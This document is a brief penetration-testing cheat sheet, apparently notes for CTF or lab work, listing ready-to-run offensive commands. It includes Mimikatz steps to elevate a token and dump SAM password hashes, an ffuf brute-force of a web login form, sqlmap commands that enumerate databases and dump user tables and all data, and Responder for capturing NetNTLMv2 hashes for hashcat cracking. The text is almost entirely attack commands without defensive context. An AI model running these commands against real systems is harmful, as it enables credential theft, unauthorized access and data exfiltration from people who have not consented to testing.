Mimikatz
# Must be run as admin
privilege::debug
token::elevate
lsadump::sam
FFUF
# Brute Force Username/Password
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.10.10/customers/login -fc 200
Sqlmap
# Basic scan (--technique=T restricts testing to time-based blind; --force-ssl forces HTTPS)
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
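# Dump data (--risk=3 adds OR-based tests, which can modify rows if the injection point is in an UPDATE or DELETE statement)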
sqlmap -u $URL --level=4 --risk=3 --dump
# Using a request file
sqlmap -r request.txt
# Enumerate DBs
sqlmap -r request.txt --dbs
# Enumerate tables
sqlmap -r request.txt -D <db> --tables
# Dump users
sqlmap -r request.txt -D <db> -T users --dump
# Dump all
sqlmap -r request.txt --dump-all
Responder
sudo responder -I tun0
# Wait for a hash, then try to crack it: hashcat mode 5600 (NetNTLMv2)